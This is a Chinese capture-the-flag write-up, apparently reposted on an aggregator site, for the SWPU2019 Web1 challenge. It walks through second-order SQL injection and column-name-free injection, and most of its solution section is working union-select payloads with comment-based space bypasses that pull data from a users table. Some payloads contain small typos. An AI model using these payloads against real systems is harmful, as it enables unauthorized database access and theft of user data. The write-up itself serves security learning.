[SWPU2019]Web1 SQL二次注入+无列名注入 - 走看看

zoukankan html css js c++ java

[SWPU2019]Web1 SQL二次注入+无列名注入
写在前边

　　题目在BUU上有复现，主要知识点是SQL二次注入，无列名注入，mysql中的information_schma库 https://www.anquanke.com/post/id/193512

　　无列名注入 https://www.cnblogs.com/Lee-404/p/12833788.html

解题

　　打开题目，发现是一个登陆，有个注册界面，随意注册一个账号登陆发现是个类似留言板功能的界面

　　fuzz一下，发现是个二次注入，当广告名为1'时报错

　　猜测语句
select * from table_name where id = '$id' limit 0,1
　　直接注入一把梭

　　获取列数
-1'/**/group/**/by/**/22,'1 //有22列，要一列列试过去
　　查看版本
-1'/**/union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'
　　查看表名
-1'/**/union/**/select/**/1, (select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/sele ct*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'
　查看表值
-1'/**/union/**/select/**/1, (select/**/group_concat(b)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/sele ct*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'1
参考链接

　　https://www.cnblogs.com/wangtanzhi/p/12241499.html
查看全文

相关阅读:
iOS中block的探究
 输出IOS 版本号
 Luke's Homepage
ObjectiveC: delegate的那点事儿
 浅谈XCode编译器的Blocks功能
 一个横版的tableViewFantasyView
iOS中block的探究
 NSRunLoop 概述和原理
 Block使用中的一些疑问解答
 Flex 中的注释

原文地址：https://www.cnblogs.com/Lee-404/p/12830910.html

Copyright © 2011-2022 走看看